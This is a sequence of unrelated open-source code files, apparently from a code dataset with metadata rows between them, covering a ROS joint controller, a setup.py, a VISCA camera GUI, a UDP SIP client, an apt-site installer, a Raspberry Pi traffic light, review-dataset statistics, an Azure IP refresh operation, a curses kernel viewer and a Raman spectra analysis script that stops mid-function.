rospy.logerr('%s-%s:setup: Error connecting to topic %s ->(%s)'%(self.type, self.name, self.command_topic, e))
return -1
else:
rospy.logerr('%s-%s:setup: No command topic supplied.'%(self.type, self.name))
return -1
self.initialized = True
return 0
def setDesiredJointValue(self, name, value):
'''
Sets the joint value to desired value
@param name: name of the joint
@type name: string
@param value: desired value of the joint
@type value: array with the values of [position, velocity, effort]
@return: 0 if OK, -1 otherwise
'''
if not self.initialized:
rospy.logerr('%s-%s:setDesiredJointValue: interface not initialized correctly'%(self.type, self.name, name))
return -1
if self.joint_state_pointer.has_key(name):
if len(value) == 3:
self.joint_state_pointer[name][0] = float(value[0])
self.joint_state_pointer[name][1] = float(value[1])
self.joint_state_pointer[name][2] = float(value[2])
else:
rospy.logerr('%s-%s:setDesiredJointValue: incorrect length of desired value %s'%(self.type, self.name, value))
return -1
else:
rospy.logerr('%s-%s:setDesiredJointValue: joint %s is not associated with this interface'%(self.type, self.name, name))
return -1
return 0
def sendCommand(self):
'''
Sends the current value of joint_state attribute to the controller
@return: 0 if OK, -1 otherwise
'''
if not self.initialized:
return -1
# copy desired values into the joint_state structure
for i in range(len(self.joint_names)):
self.joint_state.position[i] = self.joint_state_pointer[self.joint_names[i]][0]
self.joint_state.velocity[i] = self.joint_state_pointer[self.joint_names[i]][1]
self.joint_state.effort[i] = self.joint_state_pointer[self.joint_names[i]][2]
#self.joint_state.position=[]
self.joint_state.header.stamp = rospy.Time.now()
#rospy.loginfo('%s-%s:sendCommand: sending command (pos = %s) to %s'%(self.type, self.name, self.joint_state.position, self.command_topic))
self.command_publisher.publish(self.joint_state)
return 0
def getState(self):
'''
Gets the state of the controller interface
@return: the state of the component based on robotnik_trajectory_msgs.msg.State
'''
return self.state
def stop(self):
'''
Stops any movement
@return: 0 if OK, -1 otherwise
'''
# Sets velocity to 0.0
for name in self.joint_names:
self.joint_state_pointer[name][1] = 0.0
self.sendCommand()
return 0
def receiveStateCb(self, msg):
'''
Callback associated with the topic state
'''
pass
def shutdown(self):
'''
Unregister ROS components
'''
if hasattr(self, 'command_publisher'):
self.command_publisher.unregister()
if hasattr(self, 'state_subscriber'):
self.state_subscriber.unregister()
self.initialized = False
def initialize(self):
'''
Initializes the component
'''
self.state = State.READY_STATE
def recover(self):
'''
Recovers the component
'''
pass
| bsd-3-clause | -7,979,857,014,212,805,000 | 25.774775 | 142 | 0.666386 | false |
mearns/pyps | setup.py | 1 | 2100 | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
import sys
sys.path.insert(0, 'pyps')
import version as proj_version
import pyps.version as proj_version
requires = [
'docit',
'colour',
]
setup(
name='pyps',
author='Brian Mearns',
author_email='[email protected]',
url='https://github.com/mearns/pyps',
license='Affero GPLv3+ --- See LICENSE.txt',
#Provide a brief description. The long description is loaded from README.rst
#description='Brief description of the package.',
#Load the version string from the built-in version module.
version=proj_version.setuptools_string(),
#Uses MANIFEST.in to decide what to put in source distribution.
include_package_data = True,
#Automaticaly search for modules, identified by __init__.py
packages = find_packages('.', exclude=["tests"]),
#Other pypi packages that are dependencies for this package.
# To specify a particular version, do like 'package (>=1.2.3)'
requires = requires,
#pypi packages that aren't necessarily required by the package, but are
# required for certain setup.py commands. These will not be installed, but will
# be downloaded into the local directory when setup.py is runn.
setup_requires = requires + [
'nose>=1.0',
'sphinx>=0.5',
'sphinx_rtd_theme',
'nosetp',
],
entry_points = {
'console_scripts': [
#'script-name=module.path:main_function',
#'pyps=pyps.main',
]
},
#Less desirable than the nosetests command, but allows you to use the
# standard `tests` command to run nosetests.
test_suite = 'nose.collector',
tests_require = requires + [
'nose>=1.0',
'pychangelog>=1.1',
'pillow>=2.2.1'
],
classifiers = [
#'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
#'Natural Language :: English',
#'Operating System :: OS Independent',
],
)
| agpl-3.0 | -7,089,841,201,979,759,000 | 26.767123 | 83 | 0.615238 | false |
PixelStereo/viscam | src/viscam.py | 1 | 3820 | #! /usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
from time import sleep
from PySide2.QtGui import QStandardItemModel, QStandardItem
from PySide2.QtCore import Slot, QDir, QAbstractListModel, Qt, QFile
from PySide2.QtWidgets import QWidget, QApplication, QHBoxLayout, QDialog, QListView, QListWidget, QPushButton, \
QTableWidget, QTableView, QFileDialog, QTableWidgetItem, QWidget, QTreeView, QMainWindow, \
QSpinBox, QGroupBox, QGridLayout, QCheckBox, QSlider, QLabel
from properties import Properties_UI
from focus import Focus_UI
from zoom import Zoom_UI
from pan_tilt import Pan_Tilt_UI
from exposure import Exposure_UI
from white_balance import WhiteBalance_UI
class Visca_UI(QGroupBox):
"""
A Visca Camera Control Panel
"""
def __init__(self, cam):
super(Visca_UI, self).__init__()
properties_UI = Properties_UI(self, cam)
whiteBalance_UI = WhiteBalance_UI(self, cam)
focus_UI = Focus_UI(self, cam)
zoom_UI = Zoom_UI(self, cam)
pan_tilt_UI = Pan_Tilt_UI(self, cam)
exposure_UI = Exposure_UI(self, cam)
mainLayout = QGridLayout()
mainLayout.addWidget(properties_UI, 1, 1, 1, 1)
mainLayout.addWidget(whiteBalance_UI, 1, 2, 1, 1)
mainLayout.addWidget(zoom_UI, 2, 1, 1, 1)
mainLayout.addWidget(focus_UI, 3, 2, 1, 1)
mainLayout.addWidget(pan_tilt_UI, 3, 1, 1, 1)
mainLayout.addWidget(exposure_UI, 2, 2, 1, 1)
self.setTitle('VISCA')
self.setLayout(mainLayout)
self.cam = cam
self.initialise_values()
self.move(40, 40)
self.refresh()
def initialise_values(self):
# -------------------------------------
# TODO
# these params needs to have UI
# -------------------------------------
IR_auto = self.cam._query('IR_auto')
# Turn off digital zoom aka zoom_digital
self.cam.zoom_digital = False
# Turn off datascreen display
self.cam.menu_off()
self.cam.info_display = False
def refresh(self):
"""
ask the camera the actual values and refresh UI
"""
# PROPERTIES
power = self.cam._query('power')
self.power.setChecked(power)
video = self.cam._query('video')
self.video.setCurrentIndex(self.video.findText(video))
IR = self.cam._query('IR')
self.IR.setChecked(IR)
FX = self.cam._query('FX')
self.FX.setCurrentIndex(self.FX.findText(FX))
# WHITE BALANCE
WB = self.cam._query('WB')
self.WB.setCurrentIndex(self.WB.findText(WB))
RGain = self.cam._query('RGain')
self.RGain.setValue(RGain)
BGain = self.cam._query('BGain')
self.BGain.setValue(BGain)
# ZOOM
self.zoom_wide_speed.setValue(3)
self.zoom_tele_speed.setValue(3)
zoom = self.cam._query('zoom')
self.zoom_direct_value.setValue(zoom)
# EXPOSURE
slowshutter = self.cam._query('slowshutter')
self.slowshutter.setChecked(slowshutter)
backlight = self.cam._query('backlight')
self.backlight.setChecked(backlight)
AE = self.cam._query('AE')
self.AE.setCurrentIndex(self.AE.findText(AE))
# PAN TILT
self.pan_speed.setValue(3)
self.tilt_speed.setValue(3)
pan,tilt = self.cam._query('pan_tilt')
self.tilt.setValue(tilt)
self.pan.setValue(pan)
# FOCUS
self.focus_far_speed.setValue(3)
self.focus_near_speed.setValue(3)
focus = self.cam._query('focus')
self.focus_direct_value.setValue(focus)
nearlimit = self.cam._query('focus_nearlimit')
self.focus_nearlimit_value.setValue(nearlimit)
| lgpl-3.0 | 7,299,021,264,485,589,000 | 36.087379 | 119 | 0.604188 | false |
albagcs/ptavi-p4 | client.py | 1 | 1158 | #!/usr/bin/python
# -*- coding: iso-8859-15 -*-
"""
Programa cliente que abre un socket a un servidor
"""
import socket
import sys
# Cliente UDP simple.
# Dirección IP del servidor.
try:
SERVER = sys.argv[1]
PORT = int(sys.argv[2])
# Contenido que vamos a enviar
METHOD = sys.argv[3]
LINE = sys.argv[4]
EXPIRES = int(sys.argv[5])
except IndexError:
sys.exit("Usage: client.py ip puerto register sip_address expires_value")
except ValueError:
sys.exit("Usage: client.py ip puerto register sip_address expires_value")
# Creamos el socket, lo configuramos y lo atamos a un servidor/puerto
my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
my_socket.connect((SERVER, PORT))
print "Enviando: " + METHOD.upper() + " sip:" + LINE + " SIP/2.0\r\n\r\n"
print "Enviando: " + str(EXPIRES)
LINE_EXPIRES = "Expires: " + str(EXPIRES) + '\r\n\r\n'
my_socket.send(METHOD.upper() + " sip:" + LINE + " SIP/2.0\r\n" + LINE_EXPIRES)
data = my_socket.recv(1024)
print 'Recibido -- ', data
print "Terminando socket..."
# Cerramos todo
my_socket.close()
print "Fin."
| gpl-2.0 | 362,235,933,809,275,900 | 27.925 | 79 | 0.680207 | false |
veltzer/pdmt | pdmt/plugins/nodes/operations/installaptsite.py | 1 | 1466 | import os
import pdmt.config
import pdmt.utils.fileops
import pdmt.utils.subproc
'''
In order for this plugin to work you have to make your web folder
be writable by the user running pdmt.
You can do this with:
$ chmod g+w -R /var/www
$ chgrp $USER -R /var/www
'''
class Operation(object):
def __init__(self):
super().__init__(
'installaptsite',
'install the apt site',
)
def run(self):
# the if is needed to avoid an exception
serv = pdmt.config.ns_apt.p_abs_dir
conf = os.path.join(serv, pdmt.config.ns_apt.p_conf)
pdmt.utils.fileops.rmtreesoft(serv)
pdmt.utils.fileops.mkdircopysoft('makot/distributions', conf)
pdmt.utils.fileops.mkdircopysoft('makot/options', conf)
pdmt.utils.fileops.mkdircopysoft('makot/index.php', serv)
# pdmt.utils.fileops.mkdir(os.path.join(serv,'pool'))
final_key = os.path.join(serv, pdmt.config.ns_apt.p_keyname)
pdmt.utils.subproc.check_output([
'gpg',
'--armour',
'--export',
'--output',
final_key,
])
pdmt.utils.fileops.chmod(final_key, 0o0444)
# the creation of the next two files is so people could start using the site although
# it is empty
pdmt.utils.fileops.create_empty_filegz(pdmt.config.ns_apt.p_file_sources)
pdmt.utils.fileops.create_empty_file(pdmt.config.ns_apt.p_file_binary)
| gpl-3.0 | -3,912,588,822,752,181,000 | 32.318182 | 93 | 0.622783 | false |
chatzipap/CIE2016 | traffic_lights_04_Light controled by time & day.py | 1 | 1526 | '''
Σηματοδότης ρυθμιζόμενος ανά ώρα και ημέρα
'''
from gpiozero import LED
from time import sleep
from datetime import datetime
# Αντιστοίχιση στοιχείων και ακίδων GPIO
red = LED(27)
orange = LED(19)
green=LED(5)
buzzer = LED(10)
# Αρχικοποίηση καταστάσεων στοιχείων
red.off()
orange.off()
green.off()
sleep(1)
# Συνάρτηση λειτουργίας σηματοδότη
def trafficLight(tRed, tGreen):
red.on()
sleep(tRed - 2)
buzzer.on()
sleep(2)
buzzer.off()
red.off()
green.on()
sleep(tGreen)
green.off()
orange.on()
sleep(2)
orange.off()
# Λίστες χρόνων
normal = [15,7] # Λίστα με χρόνους κανονικής ροής οχημάτων
high = [13,9] # Λίστα με χρόνους αυξημενης ροής οχημάτων
# Επαναληπτική διαδικασία
while True:
cHour = datetime.today().hour # cHour = τρέχουσα ώρα
cDay = datetime.today().weekday() # cDay = τρέχουσα ημέρα της εβδομάδας, 0=Δευτέρα
if cHour in [7,15,23] and cDay not in [5,6] :
# Αυξημένη ροή αυτοκινήτων
trafficLight(*high)
print ('high')
else:
# Κανονική ροή αυτοκινήτων
trafficLight(*normal)
print ('normal')
| mit | 8,030,386,594,343,667,000 | 20.535714 | 86 | 0.616086 | false |
anthonylife/ReviewBasedRatingPrediction | script/cntBasicStatics.py | 1 | 3154 | #!/usr/bin/env python
#encoding=utf8
#Copyright [2014] [Wei Zhang]
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
###################################################################
# Date: 2014/5/8 #
# Count the basic statistics of the specified dataset #
# e.g. 1.User number; 2.Item number; 3. Review Number; #
# 4.User average review num; 5. Item average review num; #
# 6.Average length of review; 7. Rating distribution. #
###################################################################
import sys, csv, json, argparse, pylab
import numpy as np
from collections import defaultdict
with open("../SETTINGS.json") as fp:
settings = json.loads(fp.read())
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-d', type=int, action='store',
dest='data_num', help='choose which data set to use')
if len(sys.argv) != 3:
print 'Command e.g.: python cntBasicStatics.py -d 0(1)'
sys.exit(1)
para = parser.parse_args()
if para.data_num == 0:
review_file = settings["ROOT_PATH"] + settings["SRC_DATA_FILE1_1"]
elif para.data_num == 1:
review_file = settings["ROOT_PATH"] + settings["SRC_DATA_FILE2_1"]
else:
print 'Invalid choice of dataset'
sys.exit(1)
uid_review_cnt = defaultdict(int)
pid_review_cnt = defaultdict(int)
review_num = 0
ave_ur_num = 0
ave_pr_num = 0
ave_lenr_num = 0
rating_ratio = defaultdict(int)
for line in open(review_file):
uid, pid, rating, date, wcnt = line.strip("\r\t\n").split(" ")[:5]
uid_review_cnt[uid] += 1
pid_review_cnt[pid] += 1
review_num += 1
ave_lenr_num += int(wcnt)
rating_ratio[float(rating)] += 1
cnt_num = [[entry[0], float(entry[1])/review_num] for entry in rating_ratio.items()]
#keys = [entry[0] for entry in cnt_num]
#vals = [entry[1] for entry in cnt_num]
#width = 0.2
#pylab.xticks(np.array(keys[:50])+width/2.0, keys, rotation=45)
#pylab.bar(keys[:50], vals[:50], width, color='r')
#pylab.show()
print '1.User number:\t\t%d' % len(uid_review_cnt)
print '2.Item number:\t\t%d' % len(pid_review_cnt)
print '3.Review number:\t\t%d' % review_num
print '4.User average review num:\t\t%.2f' % (float(review_num)/len(uid_review_cnt))
print '5.Item average review num:\t\t%.2f' % (float(review_num)/len(pid_review_cnt))
print '6.Average length of review:\t\t%.2f' % (float(ave_lenr_num)/review_num)
print '7.Rating distribution:'
print cnt_num
if __name__ == "__main__":
main()
| apache-2.0 | 6,009,492,705,088,222,000 | 37 | 88 | 0.600507 | false |
QualiSystems/Azure-Shell | package/cloudshell/cp/azure/domain/vm_management/operations/refresh_ip_operation.py | 1 | 4048 | class RefreshIPOperation(object):
def __init__(self, vm_service, resource_id_parser):
"""
:param vm_service: cloudshell.cp.azure.domain.services.virtual_machine_service.VirtualMachineService
:param resource_id_parser: cloudshell.cp.azure.common.parsers.azure_model_parser.AzureModelsParser
:return:
"""
self.vm_service = vm_service
self.resource_id_parser = resource_id_parser
def refresh_ip(self, cloudshell_session, compute_client, network_client, resource_group_name, vm_name,
private_ip_on_resource, public_ip_on_resource_attr_tuple, resource_fullname, logger):
"""Refresh Public and Private IP on CloudShell resource from corresponding deployed Azure instance
:param cloudshell_session: cloudshell.api.cloudshell_api.CloudShellAPISession instance
:param compute_client: azure.mgmt.compute.ComputeManagementClient instance
:param network_client: azure.mgmt.network.NetworkManagementClient instance
:param resource_group_name: The name of the resource group
:param vm_name: The name of the virtual machine
:param private_ip_on_resource: private IP on the CloudShell resource
:param public_ip_on_resource_attr_tuple: (key,val) public IP on the CloudShell resource (we preserve public ip namespace key)
:param resource_fullname: full resource name on the CloudShell
:param logger: logging.Logger instance
:return
"""
# check if VM exists and in the correct state
logger.info("Check that VM {} exists under resource group {} and is active".format(
vm_name, resource_group_name))
public_ip_key = public_ip_on_resource_attr_tuple[0]
public_ip_on_resource = public_ip_on_resource_attr_tuple[1]
vm = self.vm_service.get_active_vm(
compute_management_client=compute_client,
group_name=resource_group_name,
vm_name=vm_name)
# find the primary nic
primary_nic_ref = next(iter(filter(lambda x: x.primary, vm.network_profile.network_interfaces)), None)
nic_reference = primary_nic_ref if primary_nic_ref else vm.network_profile.network_interfaces[0]
nic_name = self.resource_id_parser.get_name_from_resource_id(nic_reference.id)
logger.info("Retrieving NIC {} for VM {}".format(nic_name, vm_name))
nic = network_client.network_interfaces.get(resource_group_name, nic_name)
vm_ip_configuration = nic.ip_configurations[0]
private_ip_on_azure = vm_ip_configuration.private_ip_address
public_ip_reference = vm_ip_configuration.public_ip_address
if public_ip_reference is None:
logger.info("There is no Public IP attached to VM {}".format(vm_name))
public_ip_on_azure = ""
else:
public_ip_name = self.resource_id_parser.get_name_from_resource_id(public_ip_reference.id)
logger.info("Retrieving Public IP {} for VM {}".format(public_ip_name, vm_name))
pub_ip_addr = network_client.public_ip_addresses.get(resource_group_name, public_ip_name)
public_ip_on_azure = pub_ip_addr.ip_address
logger.info("Public IP on Azure: '{}'".format(public_ip_on_azure))
logger.info("Public IP on CloudShell: '{}'".format(public_ip_on_resource))
if public_ip_on_azure != public_ip_on_resource:
logger.info("Updating Public IP on the resource to '{}' ...".format(public_ip_on_azure))
cloudshell_session.SetAttributeValue(resource_fullname, public_ip_key, public_ip_on_azure)
logger.info("Private IP on Azure: '{}'".format(private_ip_on_azure))
logger.info("Private IP on CloudShell: '{}'".format(private_ip_on_resource))
if private_ip_on_azure != private_ip_on_resource:
logger.info("Updating Private IP on the resource to '{}' ...".format(private_ip_on_azure))
cloudshell_session.UpdateResourceAddress(resource_fullname, private_ip_on_azure)
| apache-2.0 | 3,281,980,548,673,135,000 | 56.014085 | 133 | 0.673666 | false |
ipselium/cpyvke | cpyvke/cpyvke.py | 1 | 5093 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright © 2016-2018 Cyril Desjouy <[email protected]>
#
# This file is part of cpyvke
#
# cpyvke is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# cpyvke is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with cpyvke. If not, see <http://www.gnu.org/licenses/>.
#
#
# Creation Date : Wed Nov 9 10:03:04 2016
# Last Modified : mar. 10 avril 2018 20:54:45 CEST
"""
-----------
DOCSTRING
@author: Cyril Desjouy
"""
import os
import sys
import locale
import logging
import argparse
import time
from jupyter_client import find_connection_file
from logging.handlers import RotatingFileHandler
from .curseswin.app import InitApp
from .curseswin.mainwin import MainWin
from .utils.config import cfg_setup
from .utils.kernel import connect_kernel, print_kernel_list
from .utils.kd import kd_status
from .utils.sockets import SocketManager
from .utils.term_colors import RED, RESET
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
def init_cf(lockfile):
""" Init connection file. """
with open(lockfile, 'r') as f:
kid = f.readline()
return find_connection_file(kid)
def with_daemon(lockfile, pidfile, cmd):
""" Launch daemon. """
os.system(cmd)
while os.path.exists(pidfile) is False:
time.sleep(0.1)
return init_cf(lockfile)
def no_lock_exit():
""" If no kd5.lock ! """
message = '{}Error :{}\tCannot find kd5.lock !\n\tFixing issues shutting down kd5...\n'
sys.stderr.write(message.format(RED, RESET))
os.system('kd5 stop')
sys.stderr.write("You can now restart cpyvke!\n")
sys.exit(1)
def parse_args(lockfile, pidfile):
""" Parse Arguments. """
parser = argparse.ArgumentParser()
parser.add_argument("-L", "--list", help="List all kernels",
action="store_true")
parser.add_argument("integer", help="Start up with existing kernel. \
INTEGER is the id of the connection file. \
INTEGER can also be the keyword 'last' for 'last kernel'",
nargs='?')
args = parser.parse_args()
pid = kd_status(pidfile)
if args.list:
print_kernel_list()
sys.exit(0)
elif os.path.exists(lockfile) and pid:
try:
cf = init_cf(lockfile)
except OSError:
sys.stderr.write('lockfile points to an unknown connection file.\n')
sys.stderr.write("Try 'kd5 stop'\n")
sys.exit(1)
if args.integer:
message = 'Daemon is already running. Dropping argument {}\n'
sys.stderr.write(message.format(args.integer))
time.sleep(1.5)
elif not os.path.exists(lockfile) and pid:
no_lock_exit()
elif args.integer == 'last' and not os.path.exists(lockfile):
no_lock_exit()
elif args.integer == 'last' and os.path.exists(lockfile):
cmd = 'kd5 last'
cf = with_daemon(lockfile, pidfile, cmd)
elif args.integer:
try:
find_connection_file(str(args.integer))
except OSError:
message = '{}Error :{}\tCannot find kernel id. {} !\n\tExiting\n'
sys.stderr.write(message.format(RED, RESET, args.integer))
sys.exit(1)
else:
cmd = 'kd5 start ' + str(args.integer)
cf = with_daemon(lockfile, pidfile, cmd)
else:
cmd = 'kd5 start'
cf = with_daemon(lockfile, pidfile, cmd)
return args, cf
def main(args=None):
""" Launch cpyvke. """
# Parse Config
cfg = cfg_setup()
config = cfg.run()
# Define Paths
logdir = os.path.expanduser('~') + '/.cpyvke/'
lockfile = logdir + 'kd5.lock'
pidfile = logdir + 'kd5.pid'
logfile = logdir + 'cpyvke.log'
# Logger
logger = logging.getLogger("cpyvke")
logger.setLevel(logging.DEBUG)
# create the logging file handler
handler = RotatingFileHandler(logfile, maxBytes=10*1024*1024,
backupCount=5)
logmsg = '%(asctime)s :: %(name)s :: %(threadName)s :: %(levelname)s :: %(message)s'
formatter = logging.Formatter(logmsg, datefmt='%Y-%m-%d - %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
# Parse arguments
args, cf = parse_args(lockfile, pidfile)
# Init kernel
km, kc = connect_kernel(cf)
# Init Curses App
sock = SocketManager(config, logger)
app = InitApp(kc, cf, config, sock)
# Run App
logger.info('cpyvke started')
main_curse = MainWin(app, sock, logger)
main_curse.display()
if __name__ == "__main__":
main()
| gpl-3.0 | 5,880,846,585,467,750,000 | 26.978022 | 91 | 0.629222 | false |
johnmgregoire/JCAPRamanDataProcess | PlateAlignViaEdge_v1.py | 1 | 12112 | import sys,os, pickle, numpy, pylab, operator
import cv2
from shutil import copy as copyfile
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import matplotlib.pyplot as plt
from DataParseApp import dataparseDialog
from sklearn.decomposition import NMF
projectpath=os.path.split(os.path.abspath(__file__))[0]
sys.path.append(os.path.join(projectpath,'ui'))
pythoncodepath=os.path.split(projectpath)[0]
jcapdataprocesspath=os.path.join(pythoncodepath, 'JCAPDataProcess')
sys.path.append(os.path.join(jcapdataprocesspath,'AuxPrograms'))
from fcns_ui import *
from fcns_io import *
platemapvisprocesspath=os.path.join(pythoncodepath, 'JCAPPlatemapVisualize')
sys.path.append(platemapvisprocesspath)
from plate_image_align_Dialog import plateimagealignDialog
import numpy as np
pathd={'ramanfile':r'K:\users\hte\Raman\33444\HSS_33444_map-1-_CRR-EM-copy.txt'}
pathd['mainfolder']=os.path.split(pathd['ramanfile'])[0]
pathd['savefolder']=os.path.join(pathd['mainfolder'], '20170518analysis')
pathd['infopck']=pathd['ramanfile'][:-4]+'__info.pck'
pathd['allspectra']=os.path.join(pathd['savefolder'],'allspectra.npy')
pathd['nmfdata']=os.path.join(pathd['savefolder'],'nmf4.pck')
pathd['edges']=os.path.join(pathd['savefolder'],'edges.png')
pathd['mapfill']=os.path.join(pathd['savefolder'],'blobmap.png')
pathd['blobd']=os.path.join(pathd['savefolder'],'blobd.pck')
pathd['alignedsamples']=os.path.join(pathd['savefolder'],'alignedsamples.png')
pathd['alignedsamplestxt']=os.path.join(pathd['savefolder'],'alignedsamples.txt')
pathd['spectrafolder']=os.path.join(pathd['savefolder'],'sample_spectra')
pathd['map']=os.path.join(pathd['spectrafolder'],'raman_sample_index_map.map')
pathd['samplepixels']=os.path.join(pathd['spectrafolder'],'samplepixels.png')
dx_smp=1.
dy_smp=1.
default_sample_blob_dict=dict({}, \
smp_is_square=0, smp_width=1., bcknd_is_square=0, bcknd_min_width=1.3, bcknd_max_width=1.4, removedups=1\
)
class MainMenu(QMainWindow):
def __init__(self, previousmm, execute=True, **kwargs):
super(MainMenu, self).__init__(None)
self.parseui=dataparseDialog(self, title='Visualize ANA, EXP, RUN data', **kwargs)
self.alignui=plateimagealignDialog(self, manual_image_init_bool=False)
if execute:
self.parseui.exec_()
n_components=4
def doNMF(datan,n_components=4):
# from Mitsu
#alternatively PCA ... might me faster
nmf=NMF(n_components=n_components,init='nndsvd')
data_decomp_all=nmf.fit_transform(datan)
data_components_all=nmf.components_
return data_decomp_all,data_components_all
def rgb_comp(arr2d, affine=True):
cmy_cmyk=lambda a:a[:3]*(1.-a[3])+a[3]
rgb_cmy=lambda a:1.-a
rgb_cmyk=lambda a:rgb_cmy(cmy_cmyk(a))
return numpy.array([rgb_cmyk(a) for a in arr2d])
def imGen(data_decomp_all,ramaninfod,cmykindeces=[3, 2, 1, 0]):
cmykvals=copy.copy(data_decomp_all[:, cmykindeces])
cmykvals/=cmykvals.max(axis=0)[numpy.newaxis, :]
img=numpy.reshape(rgb_comp(cmykvals), (ramaninfod['xshape'], ramaninfod['yshape'], 3))
return img
def findEdges(img_gray):
#this uses automatic thresholding from one of the cv2 tutorials
sigma = 0.33
v = np.median(img_gray)
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edges = cv2.Canny(np.uint8(img_gray),lower,upper)
return edges
def findContours(edges):
#the contours are now found by searching the most external convex hull
#this way mos of the not fully closed samples are detected as well
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
iWithContour = cv2.drawContours(edges, contours, -1, (255,20,100), 5)
mapimage = np.zeros_like(edges)
#this fills the contours
for i in range(len(contours)):
cv2.drawContours(mapimage, contours, i, color=255, thickness=-1)
#this is to calculate the center of each contour
x=[]
y=[]
for c in contours:
# compute the center of the contour
M = cv2.moments(c)
try:
x.append(M['m10']/(M['m00']))
y.append(M['m01']/(M['m00']))
except:
#this was nessesary as the divisor is sometimes 0
#yield good results but should be done with caution
x.append(M['m10']/(M['m00']+1e-23))
y.append(M['m01']/(M['m00']+1e-23))
return iWithContour, mapimage, contours, x, y
mainapp=QApplication(sys.argv)
form=MainMenu(None, execute=False)
#form.show()
#form.setFocus()
#mainapp.exec_()
parseui=form.parseui
alignui=form.alignui
parseui.rawpathLineEdit.setText(pathd['ramanfile'])
parseui.infopathLineEdit.setText(pathd['infopck'])
parseui.getinfo(ramaninfop=pathd['infopck'], ramanfp=pathd['ramanfile'])#opens or creates
if os.path.isfile(pathd['allspectra']):
with open(pathd['allspectra'], mode='rb') as f:
fullramandataarray=numpy.load(f)
elif 0:
fullramandataarray=parseui.readfullramanarray(pathd['ramanfile'])#opens or creates
with open(pathd['allspectra'], mode='wb') as f:
numpy.save(f, fullramandataarray)
ramaninfod=parseui.ramaninfod
#ramaninfod['number of spectra']
#ramaninfod['xdata']
#ramaninfod['ydata']
#ramaninfod['Wavenumbers_str']
#ramaninfod['Spectrum 0 index']
ramaninfod['xdata']/=1000.
ramaninfod['ydata']/=1000.#convert to mm
ramaninfod['xshape']= len(np.unique(ramaninfod['xdata']))
ramaninfod['yshape']= len(np.unique(ramaninfod['ydata']))
ramaninfod['dx']= (ramaninfod['xdata'].max()-ramaninfod['xdata'].min())/(ramaninfod['xshape']-1)
ramaninfod['dy']= (ramaninfod['ydata'].max()-ramaninfod['ydata'].min())/(ramaninfod['yshape']-1)
nx=dx_smp/ramaninfod['dx']
ny=dy_smp/ramaninfod['dy']
ntot=nx*ny
ramanreshape=lambda arr: np.reshape(arr, (ramaninfod['xshape'], ramaninfod['yshape'])).T[::-1, ::-1]
ramannewshape=(ramaninfod['yshape'], ramaninfod['xshape'])
image_of_x=ramanreshape(ramaninfod['xdata'])
image_of_y=ramanreshape(ramaninfod['ydata'])
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].min(), ramaninfod['ydata'].max()]
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].max(), ramaninfod['ydata'].min()]
extent=[image_of_x[0, 0], image_of_x[-1, -1], image_of_y[0, 0], image_of_y[-1, -1]]
def ramanimshow(im, **kwargs):
plt.imshow(im, origin='lower', interpolation='none', aspect=1, extent=extent, **kwargs)
if os.path.isfile(pathd['nmfdata']):
with open(pathd['nmfdata'], mode='rb') as f:
tempd=pickle.load(f)
data_decomp_all,data_components_all,rgbimagedata=[tempd[k] for k in 'data_decomp_all,data_components_all,rgbimagedata'.split(',')]
elif 1:
with open(os.path.join(pathd['savefolder'],'data_decomp_all_protocol2.pck'), mode='rb') as f:
data_decomp_all=pickle.load(f)
with open(os.path.join(pathd['savefolder'],'data_components_all_protocol2.pck'), mode='rb') as f:
data_components_all=pickle.load(f)
#rgbimagedata=imGen(data_decomp_all,ramaninfod)
rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
for i, arr in enumerate(data_decomp_all[:, :3].T):
rgbimagedata[:, :, i]=np.array([ramanreshape(arr/arr.max())])
else:
data_decomp_all,data_components_all = doNMF(datan,4)
#rgbimagedata=imGen(data_decomp_all,ramaninfod)
rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
for i, arr in enumerate(data_decomp_all[:, :3].T):
rgbimagedata[:, :, i]=np.array([ramanreshape(arr/arr.max())])
tempd=dict(zip('data_decomp_all,data_components_all,rgbimagedata'.split(','), data_decomp_all,data_components_all,rgbimagedata))
with open(pathd['nmfdata'], mode='wb') as f:
tempd=pickle.dump(tempd, f)
if 1 and os.path.isfile(pathd['blobd']):
with open(pathd['blobd'], mode='rb') as f:
blobd=pickle.load(f)
else:
edges = np.zeros(ramannewshape, dtype='uint8')
plt.clf()
for i in range(n_components):
arr=np.uint8(ramanreshape(data_decomp_all[:,i])/data_decomp_all[:,i].max()*254)
edgetemp=findEdges(arr)
# plt.imshow(edgetemp)
# plt.show()
edges[np.where(edgetemp>0)] = 244
ramanimshow(edges)
plt.savefig(pathd['edges'])
plt.clf()
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
image_of_inds=ramanreshape(numpy.arange(ramaninfod['number of spectra']))
mapfill = np.zeros(ramannewshape, dtype='uint8')
blobd={}
